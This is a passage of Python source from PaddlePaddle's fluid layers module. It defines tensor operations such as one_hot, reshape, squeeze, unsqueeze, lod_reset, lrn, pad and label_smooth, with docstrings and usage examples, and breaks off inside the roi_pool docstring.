x = np.random.rand(3,3).astype("float32")
y = np.random.rand(3,3).astype("float32")
output= exe.run(feed={"x":x, "y":y},
fetch_list=[result])
print(output)
#[array([[0.08220536],
# [0.36652038],
# [0.20541131]], dtype=float32)]
"""
helper = LayerHelper('smooth_l1_loss', **locals())
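# The op emits two outputs: 'Diff' (intermediate elementwise differences, kept
# for the backward pass) and 'Out' (the summed loss per instance).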
diff = helper.create_variable_for_type_inference(dtype=x.dtype)
loss = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='smooth_l1_loss',
inputs={
'X': x,
'Y': y,
'InsideWeight': inside_weight,
'OutsideWeight': outside_weight
},
outputs={'Diff': diff,
'Out': loss},
attrs={'sigma': sigma if sigma is not None else 1.0})
return loss
def one_hot(input, depth, allow_out_of_range=False):
"""
**WARNING:** This OP requires that the last dimension of the Tensor shape be equal to 1.
This OP will be deprecated in a future release. It is recommended to use fluid. :ref:`api_fluid_one_hot` .
The operator converts each id in the input to an one-hot vector with a
:attr:`depth` length. The value in the vector dimension corresponding to the id
is 1, and the value in the remaining dimension is 0.
The shape of the output Tensor or LoDTensor is generated by replacing the last
dimension of the input shape (which must be 1) with :attr:`depth`.
.. code-block:: text
Example 1 (allow_out_of_range=False):
input:
X.shape = [4, 1]
X.data = [[1], [1], [3], [0]]
depth = 4
output:
Out.shape = [4, 4]
Out.data = [[0., 1., 0., 0.],
[0., 1., 0., 0.],
[0., 0., 0., 1.],
[1., 0., 0., 0.]]
Example 2 (allow_out_of_range=True):
input:
X.shape = [4, 1]
X.data = [[1], [1], [5], [0]]
depth = 4
allow_out_of_range = True
output:
Out.shape = [4, 4]
Out.data = [[0., 1., 0., 0.],
[0., 1., 0., 0.],
[0., 0., 0., 0.], # This id is 5, which exceeds depth, so it is filled with all zeros.
[1., 0., 0., 0.]]
Example 3 (allow_out_of_range=False):
input:
X.shape = [4, 1]
X.data = [[1], [1], [5], [0]]
depth = 4
allow_out_of_range = False
output: Throw an exception for Illegal value
The id 5 in X is outside the valid range [0, depth).
allow_out_of_range=False means that the word id is not allowed to exceed depth,
so an exception is thrown.
Args:
input(Variable): Tensor or LoDTensor with shape :math:`[N_1, N_2, ..., N_k, 1]` ,
which contains at least one dimension and the last dimension must be 1.
The data type is int32 or int64.
depth(int|Variable): An integer (or a 1-D int32 Tensor holding an integer) defining the :attr:`depth` of the one hot dimension. If input
is word id, depth is generally the dictionary size.
allow_out_of_range(bool): A bool value indicating whether the input
indices could be out of range :math:`[0, depth)` . When input indices are
out of range, an :code:`Illegal value` exception is raised if :attr:`allow_out_of_range`
is False, or a zero-filled representation is created if it is set to True.
Default: False.
Returns:
Variable: The one-hot representations of input. A Tensor or LoDTensor with type float32.
Examples:
.. code-block:: python
import paddle.fluid as fluid
# Correspond to the first example above, where label.shape is [4, 1] and one_hot_label.shape is [4, 4].
label = fluid.data(name="label", shape=[4, 1], dtype="int64")
one_hot_label = fluid.layers.one_hot(input=label, depth=4)
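# An additional hedged sketch: ``depth`` may also be a 1-D int32 Tensor, e.g.
# when the class number is only known at runtime (``depth_t`` is a name chosen here).
depth_t = fluid.layers.fill_constant([1], "int32", 4)
one_hot_label_t = fluid.layers.one_hot(input=label, depth=depth_t)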
"""
if in_dygraph_mode():
if isinstance(depth, Variable):
depth = depth.numpy()
assert depth.shape == (
1, ), "depth of type Variable should have shape [1]"
depth = depth[0]
out = core.ops.one_hot(input, 'depth', depth, 'allow_out_of_range',
allow_out_of_range)
out.stop_gradient = True
return out
helper = LayerHelper("one_hot", **locals())
one_hot_out = helper.create_variable_for_type_inference(dtype='float32')
if not isinstance(depth, Variable):
# user attribute
inputs = {'X': input}
attrs = {'depth': depth, 'allow_out_of_range': allow_out_of_range}
else:
depth.stop_gradient = True
inputs = {'X': input, 'depth_tensor': depth}
attrs = {'allow_out_of_range': allow_out_of_range}
helper.append_op(
type="one_hot",
inputs=inputs,
attrs=attrs,
outputs={'Out': one_hot_out})
one_hot_out.stop_gradient = True
return one_hot_out
def autoincreased_step_counter(counter_name=None, begin=1, step=1):
"""
Create an auto-increasing variable, which will be automatically increased
by :attr:`step` in every iteration. By default, the first return value of this counter is 1,
and the step size is 1.
Args:
counter_name(str, optional): The counter name. Default '@STEP_COUNTER@'.
begin(int, optional): The first return value of this counter. Default 1.
step(int, optional): The step size. Default 1.
Returns:
Variable: The auto-increased Variable with data type int64.
Examples:
.. code-block:: python
import paddle.fluid as fluid
global_step = fluid.layers.autoincreased_step_counter(
counter_name='@LR_DECAY_COUNTER@', begin=0, step=1)
"""
helper = LayerHelper('global_step_counter')
if counter_name is None:
counter_name = '@STEP_COUNTER@'
counter, is_new_var = helper.create_or_get_global_variable(
name=counter_name,
dtype='int64',
shape=[1],
persistable=True,
belong_to_optimizer=True)
if is_new_var:
helper.set_variable_initializer(
counter, initializer=Constant(
value=begin - 1, force_cpu=True))
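# The counter is initialized to begin - 1; the increment op prepended below
# bumps it by `step` at the start of every iteration, so the first value read
# is `begin`.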
helper.main_program.global_block()._prepend_op(
type='increment',
inputs={'X': [counter]},
outputs={'Out': [counter]},
attrs={'step': float(step)})
counter.stop_gradient = True
return counter
def reshape(x, shape, actual_shape=None, act=None, inplace=False, name=None):
"""
This operator changes the shape of ``x`` without changing its data.
The target shape can be given by ``shape`` or ``actual_shape``.
When ``shape`` and ``actual_shape`` are set at the same time,
``actual_shape`` has a higher priority than ``shape``
but at this time ``shape`` can only be an integer list or tuple, and ``shape`` still should be set correctly to
guarantee shape inference in compile-time.
Some tricks exist when specifying the target shape.
1. -1 means the value of this dimension is inferred from the total element
number of x and remaining dimensions. Thus one and only one dimension can
be set -1.
2. 0 means the actual dimension value is going to be copied from the
corresponding dimension of x. The index of 0s in shape can not exceed
the dimension of x.
Here are some examples to explain it.
1. Given a 3-D tensor x with a shape [2, 4, 6], and the target shape
is [6, 8], the reshape operator will transform x into a 2-D tensor with
shape [6, 8] and leaving x's data unchanged.
2. Given a 3-D tensor x with a shape [2, 4, 6], and the target shape
specified is [2, 3, -1, 2], the reshape operator will transform x into a
4-D tensor with shape [2, 3, 4, 2] and leaving x's data unchanged. In this
case, one dimension of the target shape is set to -1, the value of this
dimension is inferred from the total element number of x and remaining
dimensions.
3. Given a 3-D tensor x with a shape [2, 4, 6], and the target shape
is [-1, 0, 3, 2], the reshape operator will transform x into a 4-D tensor
with shape [2, 4, 3, 2] and leaving x's data unchanged. In this case,
besides -1, 0 means the actual dimension value is going to be copied from
the corresponding dimension of x.
**Note**:
The parameter ``actual_shape`` will be deprecated in the future and only use ``shape`` instead to represent the target shape.
Args:
x(Variable): A ``Tensor`` or ``LoDTensor`` . The data type is ``float32``, ``float64``, ``int32`` or ``int64``.
shape(list|tuple|Variable): Define the target shape. At most one dimension of the target shape can be -1.
The data type is ``int32`` . If ``shape`` is a list or tuple, the elements of it should be integers or Tensors with shape [1].
If ``shape`` is a Variable, it should be a 1-D Tensor .
actual_shape(Variable, optional): A 1-D ``Tensor`` or ``LoDTensor`` . The data type is ``int32`` . If provided, reshape
according to this given shape rather than ``shape`` specifying shape.
That is to say ``actual_shape`` has a higher priority
than ``shape(list|tuple)`` but not ``shape(Variable)``. \
This argument ``actual_shape`` will be removed in a future version. \
Instructions for updating: ``actual_shape`` will be removed in future versions and replaced by ``shape``.
act (str, optional): The non-linear activation to be applied to the reshaped input. Default None.
inplace(bool, optional): If ``inplace`` is True, the input and output of ``layers.reshape``
are the same variable. Otherwise, the input and output of
``layers.reshape`` are different variable. Default False. Note that if ``x``
is more than one OPs' input, ``inplace`` must be False.
name(str, optional): The default value is None. Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name` .
Returns:
Variable: A ``Tensor`` or ``LoDTensor``. The data type is same as ``x``. It is a new tensor variable if ``inplace`` is ``False``, otherwise it is ``x``. If ``act`` is None, return the reshaped tensor variable, otherwise return the activated tensor variable.
Raises:
TypeError: If actual_shape is neither Variable nor None.
ValueError: If more than one elements of ``shape`` is -1.
ValueError: If the element of ``shape`` is 0, the corresponding dimension should be less than or equal to the dimension of ``x``.
ValueError: If the elements in ``shape`` is negative except -1.
Examples:
.. code-block:: python
import paddle.fluid as fluid
# example 1:
# attr shape is a list which doesn't contain tensor Variable.
data_1 = fluid.data(
name='data_1', shape=[2, 4, 6], dtype='float32')
reshaped_1 = fluid.layers.reshape(
x=data_1, shape=[-1, 0, 3, 2], inplace=True)
# the shape of reshaped_1 is [2,4,3,2].
# example 2:
# attr shape is a list which contains tensor Variable.
data_2 = fluid.layers.fill_constant([2,25], "int32", 3)
dim = fluid.layers.fill_constant([1], "int32", 5)
reshaped_2 = fluid.layers.reshape(data_2, shape=[dim, 10])
# the shape of reshaped_2 is [5,10].
# example 3:
data_3 = fluid.data(
name="data_3", shape=[2,4,6], dtype='float32')
reshaped_3 = fluid.layers.reshape(x=data_3, shape=[6,8])
# the shape of reshaped_3 is [6,8].
"""
if in_dygraph_mode():
#TODO(zhiqiu): enable inplace in dygraph mode.
if inplace:
warnings.warn(
"Inplace on reshape is not allowed and will be discarded in dygraph mode currently."
)
attrs = {}
if isinstance(shape, (list, tuple)):
if utils._contain_var(shape):
raise TypeError(
"The type of 'shape' in reshape must be list[int] or tuple(int) in Dygraph mode, but "
"received %s, which contains Variable." % type(shape))
attrs['shape'] = shape
else:
raise TypeError(
"The type of 'shape' in reshape must be list[int] or tuple(int) in Dygraph mode, but "
"received %s." % type(shape))
out, _ = core.ops.reshape2(x, 'shape', shape)
return dygraph_utils._append_activation_in_dygraph(out, act)
check_variable_and_dtype(
x, 'x', ['float16', 'float32', 'float64', 'int32', 'int64'], 'reshape')
check_type(shape, 'shape', (list, tuple, Variable), 'reshape')
check_type(actual_shape, 'actual_shape', (Variable, type(None)), 'reshape')
helper = LayerHelper("reshape2", **locals())
def get_new_shape_tensor(list_shape):
new_shape_tensor = []
for dim in list_shape:
if isinstance(dim, Variable):
dim.stop_gradient = True
new_shape_tensor.append(dim)
else:
assert (isinstance(dim, int))
temp_out = helper.create_variable_for_type_inference('int32')
fill_constant([1], 'int32', dim, force_cpu=True, out=temp_out)
new_shape_tensor.append(temp_out)
return new_shape_tensor
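# Helper (below): build the 'shape' attribute; Variable entries become -1
# placeholders, and the -1 / 0 conventions described in the docstring are
# validated here.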
def get_attr_shape(list_shape):
unk_dim_idx = -1
attrs_shape = []
for dim_idx, dim_size in enumerate(list_shape):
if isinstance(dim_size, Variable):
attrs_shape.append(-1)
else:
attrs_shape.append(dim_size)
if dim_size == -1:
assert unk_dim_idx == -1, (
"Only one dimension value of 'shape' in reshape can "
"be -1. But received shape[%d] is also -1." % dim_idx)
unk_dim_idx = dim_idx
elif dim_size == 0:
assert dim_idx < len(x.shape), (
"The index of 0 in `shape` must be less than "
"the input tensor X's dimensions. "
"But received shape[%d] = 0, X's dimensions = %d." %
(dim_idx, len(x.shape)))
else:
assert dim_size > 0, (
"Each dimension value of 'shape' in reshape must not "
"be negative except one unknown dimension. "
"But received shape[%d] = %s." %
(dim_idx, str(dim_size)))
return attrs_shape
inputs = {"X": x}
attrs = {}
if isinstance(shape, Variable):
shape.stop_gradient = True
inputs["Shape"] = shape
elif isinstance(shape, (list, tuple)):
assert len(shape) > 0, ("The size of 'shape' in reshape can't be zero, "
"but received %s." % len(shape))
attrs["shape"] = get_attr_shape(shape)
if utils._contain_var(shape):
inputs['ShapeTensor'] = get_new_shape_tensor(shape)
elif isinstance(actual_shape, Variable):
actual_shape.stop_gradient = True
inputs["Shape"] = actual_shape
out = x if inplace else helper.create_variable_for_type_inference(
dtype=x.dtype)
x_shape = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type="reshape2",
inputs=inputs,
attrs=attrs,
outputs={"Out": out,
"XShape": x_shape})
return helper.append_activation(out)
def squeeze(input, axes, name=None):
"""
This OP will squeeze single-dimensional entries of the input tensor's shape. If axes is provided, the
dims selected by axes are removed, and each of them must be 1. If axes is not provided, all dims equal
to 1 will be removed.
.. code-block:: text
Case1:
Input:
X.shape = (1, 3, 1, 5)
axes = [0]
Output:
Out.shape = (3, 1, 5)
Case2:
Input:
X.shape = (1, 3, 1, 5)
axes = []
Output:
Out.shape = (3, 5)
Case3:
Input:
X.shape = [1,3,1,5]
axes = [-2]
Output:
Out.shape = [1,3,5]
Args:
input (Variable): The input Tensor. Support data type: float32, float64, int8, int32, int64.
axes (list): One integer or List of integers, indicating the dimensions to be squeezed.
Axes range is :math:`[-rank(input), rank(input))`.
If axes is negative, :math:`axes=axes+rank(input)`.
name (str, optional): Please refer to :ref:`api_guide_Name`, Default None.
Returns:
Variable: Output squeezed Tensor. Data type is same as input Tensor.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import paddle.fluid.layers as layers
# set batch size=None
x = fluid.data(name='x', shape=[None, 5, 1, 10])
y = layers.squeeze(input=x, axes=[2]) # y.shape=[None, 5, 10]
"""
helper = LayerHelper("squeeze", **locals())
check_variable_and_dtype(input, 'input',
['float32', 'float64', 'int8', 'int32', 'int64'],
'squeeze')
check_type(axes, 'axes', list, 'squeeze')
out = helper.create_variable_for_type_inference(dtype=input.dtype)
x_shape = helper.create_variable_for_type_inference(dtype=input.dtype)
helper.append_op(
type="squeeze2",
inputs={"X": input},
attrs={"axes": axes},
outputs={"Out": out,
"XShape": x_shape})
return out
def unsqueeze(input, axes, name=None):
"""
Insert single-dimensional entries into the shape of a Tensor. Takes one
required argument axes, a list of dimensions that will be inserted.
Dimension indices in axes are as seen in the output tensor.
For example:
.. code-block:: text
Given a tensor such that tensor with shape [3, 4, 5],
then Unsqueezed tensor with axes=[0, 4] has shape [1, 3, 4, 5, 1].
Args:
input (Variable): The input Tensor to be unsqueezed. It is a N-D Tensor of data types float32, float64, int32.
axes (int|list|tuple|Variable): Indicates the dimensions to be inserted. The data type is ``int32`` . If ``axes`` is a list or tuple, the elements of it should be integers or Tensors with shape [1]. If ``axes`` is a Variable, it should be a 1-D Tensor .
name (str|None): Name for this layer.
Returns:
Variable: Output unsqueezed Tensor, with data type being float32, float64, int32, int64.
Examples:
.. code-block:: python
import paddle.fluid as fluid
x = fluid.layers.data(name='x', shape=[5, 10])
y = fluid.layers.unsqueeze(input=x, axes=[1])
"""
if not isinstance(axes, (int, list, tuple, Variable)):
raise TypeError(
"The type of 'axes' in unsqueeze must be int, list, tuple or Variable, but "
"received %s." % (type(axes)))
helper = LayerHelper("unsqueeze2", **locals())
inputs = {"X": input}
attrs = {}
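# Helper (below): convert each int/Variable in axes into a 1-D int32 tensor for
# the AxesTensorList input.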
def _to_Variable_list(one_list):
Variable_list = []
for ele in one_list:
if isinstance(ele, Variable):
ele.stop_gradient = True
Variable_list.append(ele)
else:
assert (isinstance(ele, int))
temp_out = helper.create_variable_for_type_inference('int32')
fill_constant([1], 'int32', ele, force_cpu=True, out=temp_out)
Variable_list.append(temp_out)
return Variable_list
if isinstance(axes, int):
axes = [axes]
if isinstance(axes, Variable):
axes.stop_gradient = True
inputs["AxesTensor"] = axes
elif isinstance(axes, (list, tuple)):
if utils._contain_var(axes):
inputs["AxesTensorList"] = _to_Variable_list(axes)
else:
attrs["axes"] = axes
out = helper.create_variable_for_type_inference(dtype=input.dtype)
x_shape = helper.create_variable_for_type_inference(dtype=input.dtype)
helper.append_op(
type="unsqueeze2",
inputs=inputs,
attrs=attrs,
outputs={"Out": out,
"XShape": x_shape})
return out
def lod_reset(x, y=None, target_lod=None):
"""
Set LoD of :attr:`x` to a new one specified by :attr:`y` or
:attr:`target_lod`. When :attr:`y` is provided, :attr:`y.lod` is
considered as the target LoD first; otherwise :attr:`y.data` is
considered as the target LoD. If :attr:`y` is not provided, the target LoD should
be specified by :attr:`target_lod`. If target LoD is specified by
:attr:`y.data` or :attr:`target_lod`, only one level LoD is supported.
.. code-block:: text
* Example 1:
Given a 1-level LoDTensor x:
x.lod = [[ 2, 3, 1 ]]
x.data = [[1.0], [2.0], [3.0], [4.0], [5.0], [6.0]]
x.dims = [6, 1]
target_lod: [4, 2]
then we get a 1-level LoDTensor:
out.lod = [[4, 2]]
out.data = [[1.0], [2.0], [3.0], [4.0], [5.0], [6.0]]
out.dims = [6, 1]
* Example 2:
Given a 1-level LoDTensor x:
x.lod = [[2, 3, 1]]
x.data = [[1.0], [2.0], [3.0], [4.0], [5.0], [6.0]]
x.dims = [6, 1]
y is a Tensor:
y.data = [[2, 4]]
y.dims = [1, 3]
then we get a 1-level LoDTensor:
out.lod = [[2, 4]]
out.data = [[1.0], [2.0], [3.0], [4.0], [5.0], [6.0]]
out.dims = [6, 1]
* Example 3:
Given a 1-level LoDTensor x:
x.lod = [[2, 3, 1]]
x.data = [[1.0], [2.0], [3.0], [4.0], [5.0], [6.0]]
x.dims = [6, 1]
y is a 2-level LoDTensor:
y.lod = [[2, 2], [2, 2, 1, 1]]
y.data = [[1.1], [2.1], [3.1], [4.1], [5.1], [6.1]]
y.dims = [6, 1]
then we get a 2-level LoDTensor:
out.lod = [[2, 2], [2, 2, 1, 1]]
out.data = [[1.0], [2.0], [3.0], [4.0], [5.0], [6.0]]
out.dims = [6, 1]
Args:
x (Variable): Input variable which could be a Tensor or LoDTensor.
y (Variable|None): If provided, output's LoD would be derived
from :attr:`y`.
target_lod (list|tuple|None): One level LoD which should be considered
as the target LoD when :attr:`y` is not provided.
Returns:
Variable: Output variable with LoD specified by this layer.
Raises:
ValueError: If :attr:`y` and :attr:`target_lod` are both None.
Examples:
.. code-block:: python
import paddle.fluid as fluid
x = fluid.layers.data(name='x', shape=[10])
y = fluid.layers.data(name='y', shape=[10, 20], lod_level=2)
out = fluid.layers.lod_reset(x=x, y=y)
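# An additional hedged sketch of the ``target_lod`` form; the values must sum
# to the number of rows of x at runtime (assumed to be 10 here).
out2 = fluid.layers.lod_reset(x=x, target_lod=[6, 4])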
"""
check_variable_and_dtype(x, 'x', ['float32', 'float64', 'int32', 'int64'],
'lod_reset')
helper = LayerHelper("lod_reset", **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
if y is not None:
if y.lod_level > 0:
check_variable_and_dtype(
y, 'y', ['float32', 'float64', 'int32', 'int64'], 'lod_reset')
else:
check_variable_and_dtype(y, 'y', ['int32', 'int64'], 'lod_reset')
helper.append_op(
type="lod_reset", inputs={'X': x,
'Y': y}, outputs={'Out': out})
elif target_lod is not None:
helper.append_op(
type="lod_reset",
inputs={'X': x},
attrs={'target_lod': target_lod},
outputs={'Out': out})
else:
raise ValueError("y and target_lod should not be both none.")
return out
def lod_append(x, level):
"""
Append level to LoD of :attr:`x`.
.. code-block:: text
* Example 1:
given a 1-level LoDTensor x:
x.lod = [[ 2, 3, 1 ]]
x.data = [[1.0], [2.0], [3.0], [4.0], [5.0], [6.0]]
x.dims = [6, 1]
level: [1, 1, 1, 1, 1, 1, 1]
then we get a 2-level LoDTensor:
x.lod = [[ 2, 3, 1 ], [1, 1, 1, 1, 1, 1]]
x.data = [[1.0], [2.0], [3.0], [4.0], [5.0], [6.0]]
x.dims = [6, 1]
Args:
x (Variable): Input variable which could be a tensor or LoDTensor.
level (list|tuple|Variable): The LoD level to be appended into LoD of x.
Returns:
Variable: Output variable with new LoD level.
Raises:
ValueError: If :attr:`x` is None, or :attr:`level` is neither iterable nor a Variable.
Examples:
.. code-block:: python
import paddle.fluid as fluid
x = fluid.layers.data(name='x', shape=[6, 10], lod_level=1)
out = fluid.layers.lod_append(x, [1,1,1,1,1,1])
"""
try:
    from collections.abc import Iterable  # Python 3.3+
except ImportError:
    from collections import Iterable  # Python 2 fallback
if x is None:
raise ValueError("Input(x) can't be None.")
if (not isinstance(level, Iterable)) and (not isinstance(level, Variable)):
raise ValueError("Input(level) must be list, tuple or Variable.")
helper = LayerHelper("lod_append", **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
inputs = {'X': x}
attrs = {'append': True}
if isinstance(level, Variable):
inputs['Y'] = level
else:
attrs['target_lod'] = level
helper.append_op(
type="lod_reset", inputs=inputs, attrs=attrs, outputs={'Out': out})
return out
def lrn(input, n=5, k=1.0, alpha=1e-4, beta=0.75, name=None,
data_format='NCHW'):
"""
This operator implements the Local Response Normalization Layer.
This layer performs a type of "lateral inhibition" by normalizing over local input regions.
For more information, please refer to `ImageNet Classification with Deep Convolutional Neural Networks <https://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks.pdf>`_
The formula is as follows:
.. math::
Output(i, x, y) = Input(i, x, y) / \\left(k + \\alpha \\sum\\limits^{\\min(C-1, i + n/2)}_{j = \\max(0, i - n/2)}(Input(j, x, y))^2\\right)^{\\beta}
In the above equation:
- :math:`n` : The number of channels to sum over.
- :math:`k` : The offset (avoid being divided by 0).
- :math:`\\alpha` : The scaling parameter.
- :math:`\\beta` : The exponent parameter.
Args:
input (Variable): Input feature, 4D-Tensor with the shape of [N,C,H,W] or [N, H, W, C],
where N is the batch size, C is the input channel, H is height, W is width. The data
type is float32. The rank of this tensor must be 4, otherwise it will raise ValueError.
n (int, optional): The number of channels to sum over. Default: 5
k (float, optional): An offset, positive. Default: 1.0
alpha (float, optional): The scaling parameter, positive. Default:1e-4
beta (float, optional): The exponent, positive. Default:0.75
name (str, optional): The default value is None. Normally there is no need for user to set
this property. For more information, please refer to :ref:`api_guide_Name`
data_format (str, optional): Specify the data format of the input, and the data format of the output
will be consistent with that of the input. An optional string from: `"NCHW"`, `"NHWC"`.
The default is `"NCHW"`. When it is `"NCHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_height, input_width]`.
Returns:
Variable: A tensor variable storing the transformation result with the same shape and data type as input.
Examples:
.. code-block:: python
import paddle.fluid as fluid
data = fluid.data(
name="data", shape=[None, 3, 112, 112], dtype="float32")
lrn = fluid.layers.lrn(input=data)
print(lrn.shape) # [-1, 3, 112, 112]
print(lrn.dtype) # float32
"""
helper = LayerHelper('lrn', **locals())
dtype = helper.input_dtype()
input_shape = input.shape
dims = len(input_shape)
if dims != 4:
raise ValueError(
"Input's dimension size of Op(lrn) must be 4, but received %d." %
(dims))
if data_format not in ['NCHW', 'NHWC']:
raise ValueError(
"Attr(data_format) of Op(lrn) got wrong value: received " +
data_format + " but only NCHW or NHWC supported.")
mid_out = helper.create_variable_for_type_inference(
dtype=dtype, stop_gradient=True)
lrn_out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type="lrn",
inputs={"X": input},
outputs={
"Out": lrn_out,
"MidOut": mid_out,
},
attrs={
"n": n,
"k": k,
"alpha": alpha,
"beta": beta,
"data_format": data_format
})
return lrn_out
def pad(x, paddings, pad_value=0., name=None):
"""
This op will pad a tensor with a constant value given by :attr:`pad_value`, and the
padded shape is specified by :attr:`paddings`.
Specifically, the number of values padded before the elements of :attr:`x`
in dimension :attr:`i` is indicated by :attr:`paddings[2*i]`, and the number
of values padded after the elements of :attr:`x` in dimension :attr:`i` is
indicated by :attr:`paddings[2*i+1]`.
See below for an example.
.. code-block:: text
Given:
x = [[1, 2], [3, 4]]
paddings = [0, 1, 1, 2]
pad_value = 0
Return:
out = [[0, 1, 2, 0, 0]
[0, 3, 4, 0, 0]
[0, 0, 0, 0, 0]]
Args:
x (Variable): Tensor, data type is float32.
paddings (list): A list of integers. Its elements specify the padded
width before and after each dimension in turn.
The length of :attr:`paddings` must be equal to
:math:`rank(x) \\times 2`.
pad_value (float): The constant value used to pad.
name(str, optional): The default value is None.
Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name`
Returns:
The padded tensor, with the same data type and rank as :attr:`x`
Return Type:
Variable
Examples:
.. code-block:: python
# x is a rank 2 tensor variable
import paddle.fluid as fluid
x = fluid.data(name='data', shape=[300, 300], dtype='float32')
out = fluid.layers.pad(x=x, paddings=[0, 1, 1, 2], pad_value=0.)
"""
helper = LayerHelper('pad', input=x, **locals())
dtype = helper.input_dtype()
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type='pad',
inputs={'X': x},
outputs={'Out': out},
attrs={'paddings': paddings,
'pad_value': float(pad_value)})
return out
def pad_constant_like(x, y, pad_value=0., name=None):
"""
Pad :attr:`y` with :attr:`pad_value`, the number of values padded to
the edges of each axis is specified by the difference of the shape
of :attr:`x` and :attr:`y` . ((0, shape_x_0 - shape_y_0), ... (0, shape_x_n - shape_y_n))
specify padding widths for each axis. The input should be a k-D tensor(k > 0 and k < 7).
See below for an example.
.. code-block:: text
Given:
X = [[[[ 0, 1, 2],
[ 3, 4, 5]],
[[ 6, 7, 8],
[ 9, 10, 11]],
[[12, 13, 14],
[15, 16, 17]]],
[[[18, 19, 20],
[21, 22, 23]],
[[24, 25, 26],
[27, 28, 29]],
[[30, 31, 32],
[33, 34, 35]]]]
X.shape = (2, 3, 2, 3)
Y = [[[[35, 36, 37]],
[[38, 39, 40]],
[[41, 42, 43]]]]
Y.shape = (1, 3, 1, 3)
And
pad_value = 0.
Return:
Out = [[[[35, 36, 37],
[ 0, 0, 0]],
[[38, 39, 40],
[ 0, 0, 0]],
[[41, 42, 43],
[ 0, 0, 0]]],
[[[ 0, 0, 0],
[ 0, 0, 0]],
[[ 0, 0, 0],
[ 0, 0, 0]],
[[ 0, 0, 0],
[ 0, 0, 0]]]]
Out.shape = [2, 3, 2, 3]
Args:
x (Variable): Tensor, its shape specifies the shape of output.
y (Variable): Tensor, its rank is the same with :attr:`x`, and for each dimension :math:`i` ,
:math:`y\_shape[i] <= x\_shape[i]` . The data type can be float32 or float64.
pad_value (float): The constant value used to pad.
name(str, optional): The default value is None.
Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name`
Returns:
The padded tensor, with the same shape as :attr:`x` and the same data type as :attr:`y`
Return Type:
Variable
Examples:
.. code-block:: python
# x is a rank 4 tensor variable, x.shape = (2, 3, 2, 3)
# y is a rank 4 tensor variable, y.shape = (1, 3, 1, 3)
import paddle.fluid as fluid
x = fluid.data(name='x', shape=[2,3,2,3], dtype='float32')
y = fluid.data(name='y', shape=[1,3,1,3], dtype='float32')
out = fluid.layers.pad_constant_like(x=x, y=y, pad_value=0.)
# out is a rank 4 tensor variable, and out.shape = [2, 3 ,2 , 3]
"""
helper = LayerHelper('pad_constant_like', input=x, **locals())
dtype = helper.input_dtype()
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type='pad_constant_like',
inputs={'X': x,
'Y': y},
outputs={'Out': out},
attrs={'pad_value': float(pad_value)})
return out
def label_smooth(label,
prior_dist=None,
epsilon=0.1,
dtype="float32",
name=None):
"""
Label smoothing is a mechanism to regularize the classifier layer and is called
label-smoothing regularization (LSR).
Label smoothing is proposed to encourage the model to be less confident,
since optimizing the log-likelihood of the correct label directly may
cause overfitting and reduce the ability of the model to adapt. Label
smoothing replaces the ground-truth label :math:`y` with the weighted sum
of itself and some fixed distribution :math:`\mu`. For class :math:`k`,
the smoothed label is computed as
.. math::
\\tilde{y_k} = (1 - \epsilon) * y_k + \epsilon * \mu_k,
where :math:`1 - \epsilon` and :math:`\epsilon` are the weights
respectively, and :math:`\\tilde{y}_k` is the smoothed label. Usually
uniform distribution is used for :math:`\mu`.
See more details about label smoothing in https://arxiv.org/abs/1512.00567.
Parameters:
label(Variable): The input variable containing the label data. The
label data should use one-hot representation. It's
a multidimensional tensor with a shape of
:math:`[N_1, ..., Depth]`, where Depth is class number.
prior_dist(Variable, optional): The prior distribution to be used to smooth
labels. If not provided, a uniform distribution
is used. It's a multidimensional tensor with a shape of
:math:`[1, class\_num]` . The default value is None.
epsilon(float, optional): The weight used to mix up the original ground-truth
distribution and the fixed distribution. The default value is
0.1.
dtype(np.dtype|core.VarDesc.VarType|str, optional): The data type can be set
as 'float32', 'float64'. The default value is 'float32'.
name(str, optional): The default value is None. Normally there is no need for user
to set this property. For more information, please refer to
:ref:`api_guide_Name`.
Returns:
Variable: The tensor variable containing the smoothed labels.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import paddle.fluid.layers as layers
label = layers.data(name="label", shape=[1], dtype="float32")
one_hot_label = layers.one_hot(input=label, depth=10)
smooth_label = layers.label_smooth(
label=one_hot_label, epsilon=0.1, dtype="float32")
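The smoothing formula itself can be checked with a small numpy sketch (hedged; a uniform prior over 10 classes and a ground-truth class of 3 are assumptions for illustration):
.. code-block:: python
    import numpy as np
    epsilon, num_classes = 0.1, 10
    y = np.eye(num_classes)[3]                   # one-hot ground-truth label
    mu = np.full(num_classes, 1.0 / num_classes)
    y_smooth = (1 - epsilon) * y + epsilon * mu
    # y_smooth[3] == 0.91, every other entry == 0.01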
"""
if epsilon > 1. or epsilon < 0.:
raise ValueError("The value of epsilon must be between 0 and 1.")
if in_dygraph_mode():
return core.ops.label_smooth(label, prior_dist, 'epsilon',
float(epsilon))
helper = LayerHelper("label_smooth", **locals())
label.stop_gradient = True
smooth_label = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type="label_smooth",
inputs={"X": label,
"PriorDist": prior_dist} if prior_dist else {"X": label},
outputs={"Out": smooth_label},
attrs={"epsilon": float(epsilon)})
return smooth_label
@templatedoc()
def roi_pool(input,
rois,
pooled_height=1,
pooled_width=1,
spatial_scale=1.0,
rois_lod=None):
"""
This operator implements the roi_pooling layer.
Region of interest pooling (also known as RoI pooling) is to perform max pooling on inputs of nonuniform sizes to obtain fixed-size feature maps (e.g. 7*7).
The operator has three steps:
1. Dividing each region proposal into equal-sized sections with the pooled_width and pooled_height;
2. Finding the largest value in each section;
3. Copying these max values to the output buffer.
For more information, please refer to https://stackoverflow.com/questions/43430056/what-is-roi-layer-in-fast-rcnn
Args:
input (Variable): Input feature, 4D-Tensor with the shape of [N,C,H,W], where N is the batch size, C is the input channel, H is the height, W is the width. The data type is float32 or float64.
